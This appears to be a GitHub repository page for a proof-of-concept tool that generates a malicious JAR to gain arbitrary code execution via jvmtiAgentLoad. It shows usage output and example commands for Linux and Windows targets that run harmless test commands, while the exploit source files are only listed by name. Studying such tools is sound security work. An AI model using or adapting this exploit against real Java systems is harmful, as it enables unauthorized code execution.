Arbitrary code execution via jvmtiAgentLoad

Tools and code for generating a malicious JAR to exploit jvmtiAgentLoad

$ bash create_jar.sh 
Usage: create_jar.sh <TARGET_OS> <COMMAND>
Supported TARGET_OS options: linux|windows

The following command generates a JAR (mal.jar) that can be used on a Linux target:

bash create_jar.sh linux 'id > /tmp/jvmtiLoadAgent_test'

The following command generates a JAR (mal.jar) that can be used on a Windows target:

bash create_jar.sh windows 'whoami > C:\\Users\\Public\\jvmtiLoadAgent_test.txt'

Blog post on how the jvmtiAgentLoad exploit works by pyn3rd

Name		Name	Last commit message	Last commit date
Latest commit History 4 Commits
META-INF		META-INF
JavaAgent.java.template		JavaAgent.java.template
README.md		README.md
create_jar.sh		create_jar.sh

Provide feedback